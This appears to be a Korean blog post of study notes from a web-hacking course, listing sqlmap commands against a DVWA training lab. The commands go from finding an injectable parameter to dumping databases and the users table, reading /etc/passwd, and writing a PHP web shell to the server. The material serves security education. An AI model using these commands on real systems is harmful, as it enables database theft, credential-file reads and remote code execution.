728x90
반응형
값에 매개변수 ID 찾음
http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1
http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1'
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1
쿠기값 설정 및 입력
sqlmap.py --cookie="PHPSESSID=oepqtlrjsve31n793g1n2qert0; security=low" –u "http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1"
--technique
--wizard
오류 기반 이용 데이터베이스 사용자 및 데이터 베이스 목록
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --current-user
데이터베이스 목록
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --dbs
테이블 덤프
sqlmap.py --technique=E -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 -D security --tables
데이터베이스 및 테이블
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 -D security -T users --dump
전체 덤프 (권장하지 않음)
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --dump-all
권한 확인 -> 파일 읽기 및 쓰기 (FILE)
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --privileges
파일 읽기
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --file-read=/etc/passwd
웹쉘 삽입 (<?php system($_GET[1337]); ?>)
sqlmap.py -u http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=1 --file-write=shell.php --file-dest=/var/www/shell-php.php
=========================================================================
sqlmap.py --cookie="PHPSESSID=oepqtlrjsve31n793g1n2qert0; security=low" –u "http://test.nanum.info:8080/dvwa/vulnerabilities/sqli/?id=asdf&Submit=Submit#" --dbs
KISA 웹 해킹 교육가서 배운 sqlmap 핵심 요약 정리
728x90
반응형
'Security' 카테고리의 다른 글
[정보보안기사] 정보 보호의 개요 (0) | 2020.06.07 |
---|---|
[Over the Wire: Natas] Level 9 → Level 10 문제풀이 (0) | 2020.06.01 |
[Over the Wire: Natas] Level 2 → Level 3 문제풀이 (0) | 2020.05.31 |
[Over the Wire: Natas] Level 1 → Level 2 문제풀이 (0) | 2020.05.31 |
[Over the Wire: Natas] Level 0 → Level 1 문제풀이 (0) | 2020.05.31 |